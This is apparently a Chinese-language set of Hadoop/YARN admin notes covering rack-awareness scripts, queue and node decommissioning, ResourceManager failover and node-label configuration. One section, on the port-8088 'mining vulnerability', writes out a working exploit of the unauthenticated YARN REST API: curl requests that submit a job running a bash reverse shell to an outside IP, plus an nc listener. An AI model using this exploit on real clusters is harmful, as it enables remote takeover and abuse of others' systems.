Contents
  1. 1. rack 机架感知
  2. 2. 8088挖矿漏洞
  3. 3. application修改队列
  4. 4. 查看日志
  5. 5. 队列退役
  6. 6. 节点服役退役
    1. 6.1. 节点服役
    2. 6.2. 节点退役
      1. 6.2.1. yarn
  7. 7. 主备切换
  8. 8. node-label
    1. 8.1. 启动配置
    2. 8.2. 操作命令

rack 机架感知

  • 配置相关参数:在core-site.xml配置文件中设置net.topology.node.switch.mapping.implorg.apache.hadoop.net.ScriptBasedMapping,并指定net.topology.script.file.name为解析机架拓扑关系的脚本文件。

  • 编写脚本:脚本中包含每个IP所对应的rack信息,例如:
    静态划分

1
2
3
4
5
6
#!/usr/bin/python3
rack = {
"192.168.0.1":"/room1-rack1",
"192.168.0.2":"/room1-rack1",
"192.168.0.3":"/room1-rack2",
}

按网段划分v1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/python3
# this script makes assumptions about the physical environment.
# 1) each rack is its own layer 3 network with a /24 subnet, which
# could be typical where each rack has its own
# switch with uplinks to a central core router.
#
# +-----------+
# |core router|
# +-----------+
# / \
# +-----------+ +-----------+
# |rack switch| |rack switch|
# +-----------+ +-----------+
# | data node | | data node |
# +-----------+ +-----------+
# | data node | | data node |
# +-----------+ +-----------+
#
# 2) topology script gets list of IP's as input, calculates network address, and prints '/network_address/ip'.

import netaddr
import sys
sys.argv.pop(0) # discard name of topology script from argv list as we just want IP addresses

netmask = '255.255.255.0' # set netmask to what's being used in your environment. The example uses a /24

for ip in sys.argv: # loop over list of datanode IP's
address = '{0}/{1}'.format(ip, netmask) # format address string so it looks like 'ip/netmask' to make netaddr work
try:
network_address = netaddr.IPNetwork(address).network # calculate and print network address
print("/{0}".format(network_address))
except:
print("/rack-unknown") # print catch-all value if unable to calculate network address

按网段划分v2-文本切割

1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys

sys.argv.pop(0)
for ip in sys.argv:
try:
rack = "/rack-" + "_".join(ip.split(".")[:3]) # 取IP的前三个字段作为机架标识
print(rack)
except:
print("/rack-unknown")
当传入节点IP时,脚本返回对应的机架信息。
  • 重启服务:完成配置后,需要重启HDFS和YARN服务,使机架感知功能生效

8088挖矿漏洞

发起获取appID
curl -X POST http://10.33.21.190:8088/ws/v1/cluster/apps/new-application

新建任务信息文件1.json反弹shell
{
‘application-id’: ‘application_1639358619460_0019’,
‘application-name’: ‘get-shell’,
‘am-container-spec’: {
‘commands’: {
‘command’: ‘/bin/bash -i >& /dev/tcp/10.17.41.129/8888 0>&1’
}
},
‘application-type’: ‘YARN’
}

启动监听
nc -lvvp 8888

发起任务
curl -s -i -X POST -H ‘Accept: application/json’ -H ‘Content-Type: application/json’ http://10.33.21.190:8088/ws/v1/cluster/apps –data-binary @1.json

application修改队列

yarn application -movetoqueue application_1667986310829_98856 -queue spark

查看日志

Yarn:
http://xx:8088/cluster?user.name=yarn
http://xx:8088/proxy/application_1660270769302_1399007
hdfs dfs -ls /spark2-history/ |grep application_1660270769302_1399007
hdfs dfs -ls /app-logs/xx/logs/application_1660270769302_3305625 |head

yarn logs -appOwner xx -applicationId application_1660270769302_3305625 -out t1
find t1 -name “01_000001

队列退役

修改yarn.scheduler.capacity.<queue-path>.state=STOPPED
new applications cannot be submitted to itself or any of its child queues.
Existing applications continue to completion, thus the queue can be drained gracefully

节点服役退役

节点服役

hadoop/etc/hadoop/dfs.include
hdfs dfsadmin -refreshNodes

节点退役

yarn

echo “10.17.41.133” > nodemanager.excludes

vi yarn-site.xml

1
2
3
4
<property> 
<name>yarn.resourcemanager.nodes.exclude-path</name>
<value>/data/hadoop-2.8.3/etc/hadoop/nodemanager.excludes</value>
</property>

yarn rmadmin -refreshNodes -g [timeout in seconds] -client|server

节点NM进程会自动结束

主备切换

不影响cluster模式的任务,影响client模式的

1
2
3
4
5
6
7
8
9
yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby --forcemanual rm2
yarn rmadmin -transitionToActive --forcemanual rm1
$HADOOP_HOME/sbin/yarn-daemon.sh stop resourcemanager
$HADOOP_HOME/sbin/yarn-daemon.sh start resourcemanager
yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby --forcemanual rm1
yarn rmadmin -transitionToActive --forcemanual rm2
yarn rmadmin -getAllServiceState

node-label

  • 一个节点只有一个标签,默认属于DEFAULT
  • 通过配置队列使用标签资源的比例,一个标签可供多个队列使用不同比例
  • 只有Capacity Scheduler调度器支持Node Labels分区调度
  • 标签分为排他和非排他
    • (默认)排他:只属于该标签资源
    • 非排他:标签也属于DEFAULT,与Default共享资源

启动配置

yarn-site.xml

1
2
3
4
5
6
yarn.node-labels.fs-store.root-dir|hdfs:///yarn/node-labels/
yarn.node-labels.enabled|true
yarn.node-labels.configuration-type| “centralized”, “delegated-centralized” or “distributed”. Default value is “centralized”.

yarn.resourcemanager.scheduler.class|org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacityScheduler

capacity-scheduler.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<configuration>
<property>
<!-- 队列列表 -->
<name>yarn.scheduler.capacity.root.queues</name>
<value>default,Queue1</value>
</property>
<property>
<name>yarn.scheduler.capacity.root.default.capacity</name>
<value>100</value>
</property>
<property>
<name>yarn.scheduler.capacity.root.Queue1.capacity</name>
<value>0</value>
</property>
<property>
<name>yarn.scheduler.capacity.root.Queue1.maximum-applications</name>
<value>20</value>
</property>
<property>
<!-- 配置可访问分区。逗号分割的分区列表,必须 -->
<name>yarn.scheduler.capacity.root.Queue1.accessible-node-labels</name>
<value>DEMO</value>
</property>
<property>
<!-- 配置队列作业容器请求默认提交分区,可选,默认为DEFAULT分区"" -->
<name>yarn.scheduler.capacity.root.Queue1.default-node-label-expression</name>
<value>DEMO</value>
</property>
<property>
<!-- 配置队列在DEMO分区容量,必须,默认为0 -->
<name>yarn.scheduler.capacity.root.Queue1.accessible-node-labels.DEMO.capacity</name>
<value>100</value>
</property>
<property>
<!-- 配置队列在DEMO分区最大容量,可选,默认为100 -->
<name>yarn.scheduler.capacity.root.Queue1.accessible-node-labels.DEMO.maximum-capacity</name>
<value>100</value>
</property>
<configuration>

yarn rmadmin -refreshQueues

操作命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
yarn rmadmin -addToClusterNodeLabels "label_1(exclusive=true/false),label_2(exclusive=true/false)" #默认为排他

yarn cluster --list-node-labels

**Centralized**
必须是主机名,对应yarn管理页
yarn rmadmin -replaceLabelsOnNode "主机名[:port]=label1 主机名=label2"

yarn node -status <NodeId>

## 示例
yarn rmadmin -addToClusterNodeLabels "ck"
yarn rmadmin -replaceLabelsOnNode "a51-dg-hcy-bi-save-001=ck"